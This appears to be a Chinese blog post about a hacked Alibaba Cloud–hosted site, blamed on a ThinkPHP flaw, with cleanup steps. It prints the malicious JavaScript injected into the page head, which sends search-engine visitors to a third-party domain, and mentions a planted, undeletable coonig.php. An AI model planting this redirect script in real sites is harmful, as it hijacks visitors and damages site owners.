問題原由
早上突然接到客戶電話,網站在微信中無法打開,被微信攔截
在pc端訪問網站,點擊首頁中任何一個url都會跳轉到第三方網站,恍然大悟,網站是被黑了
問題分析
發現網站head被加入一下代碼
發現js裏面代碼的如下,會強制跳轉到第三方網站:
(function () {
/*百度推送代碼*/
var bp = document.createElement('script');
bp.src = '//push.zhanzhang.baidu.com/push.js';
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
/*360推送代碼*/
var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';
document.write('<script src="' + src + '" id="sozz"><\/script>');
})();
document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://2019d2.com\";");
document.writeln("</script>");
打開阿里雲虛擬主機,ftp連接到虛擬主機,發現:
- 網站根目錄多了一個文件:coonig.php,且此文件無法修改無法刪除
- index.php文件被修改
解決方法
- 提交阿里雲工單,讓阿里雲後臺人員刪除coonig.php文件
- 將index.php替換掉
本次被黑是由於thinkphp漏洞導致,詳見
http://www.thinkphp.cn/topic/61303.html
後續
有沒有小夥伴知道如何快速舉報一個網站?